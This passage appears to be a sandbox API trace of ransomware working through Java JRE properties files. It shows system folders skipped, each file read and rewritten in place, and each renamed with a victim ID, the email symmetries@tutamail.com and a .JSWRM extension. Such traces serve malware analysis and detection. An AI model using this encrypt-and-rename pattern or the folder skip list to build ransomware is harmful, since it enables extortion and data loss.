lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0069.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0069.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0069.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0069.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0069.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.973] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.974] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_sv.properties", cAlternateFileName="ME0541~1.PRO")) returned 1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2=".") returned 1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="..") returned 1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="...") returned 1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="windows") returned -1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="recovery") returned -1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="perflogs") returned -1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="documents and settings") returned 1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="system volume information") returned -1 [0069.974] lstrcmpiW (lpString1="messages_sv.properties", lpString2="msocache") returned -1 [0069.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_sv.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0069.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_sv.properties", cchWideChar=22, lpMultiByteStr=0x2411f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_sv.properties", lpUsedDefaultChar=0x0) returned 22 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_sv.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_sv.properties", cchWideChar=22, lpMultiByteStr=0x241038, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_sv.properties", lpUsedDefaultChar=0x0) returned 22 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.975] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.975] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3409) returned 1 [0069.975] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd50) returned 0x24e1e0 [0069.975] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xd50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xd50, lpOverlapped=0x0) returned 1 [0069.976] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.976] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xd50, lpOverlapped=0x0) returned 1 [0069.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.977] CloseHandle (hObject=0x458) returned 1 [0069.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0069.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0069.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0069.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0069.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0069.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.977] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0069.978] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfe8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_zh_CN.properties", cAlternateFileName="ME40CD~1.PRO")) returned 1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2=".") returned 1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="..") returned 1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="...") returned 1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="windows") returned -1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="recovery") returned -1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="perflogs") returned -1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="documents and settings") returned 1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="system volume information") returned -1 [0069.978] lstrcmpiW (lpString1="messages_zh_CN.properties", lpString2="msocache") returned -1 [0069.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0069.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_CN.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_CN.properties", cchWideChar=25, lpMultiByteStr=0x2412e0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_CN.properties", lpUsedDefaultChar=0x0) returned 25 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0069.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_CN.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_CN.properties", cchWideChar=25, lpMultiByteStr=0x241380, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_CN.properties", lpUsedDefaultChar=0x0) returned 25 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.978] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.979] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4072) returned 1 [0069.979] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfe0) returned 0x24e1e0 [0069.979] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xfe0, lpOverlapped=0x0) returned 1 [0069.980] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.980] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xfe0, lpOverlapped=0x0) returned 1 [0069.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.980] CloseHandle (hObject=0x458) returned 1 [0069.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0069.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0069.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0069.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.981] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.981] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_zh_HK.properties", cAlternateFileName="MEB8B5~1.PRO")) returned 1 [0069.981] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2=".") returned 1 [0069.981] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="..") returned 1 [0069.981] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="...") returned 1 [0069.981] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="windows") returned -1 [0069.982] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="recovery") returned -1 [0069.982] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="perflogs") returned -1 [0069.982] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="documents and settings") returned 1 [0069.982] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.982] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="system volume information") returned -1 [0069.982] lstrcmpiW (lpString1="messages_zh_HK.properties", lpString2="msocache") returned -1 [0069.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_HK.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_HK.properties", cchWideChar=25, lpMultiByteStr=0x241038, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_HK.properties", lpUsedDefaultChar=0x0) returned 25 [0069.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_HK.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_HK.properties", cchWideChar=25, lpMultiByteStr=0x240fe8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_HK.properties", lpUsedDefaultChar=0x0) returned 25 [0069.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.982] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.983] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3752) returned 1 [0069.983] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x24e1e0 [0069.983] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0069.984] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.984] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0069.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.985] CloseHandle (hObject=0x458) returned 1 [0069.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0069.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, 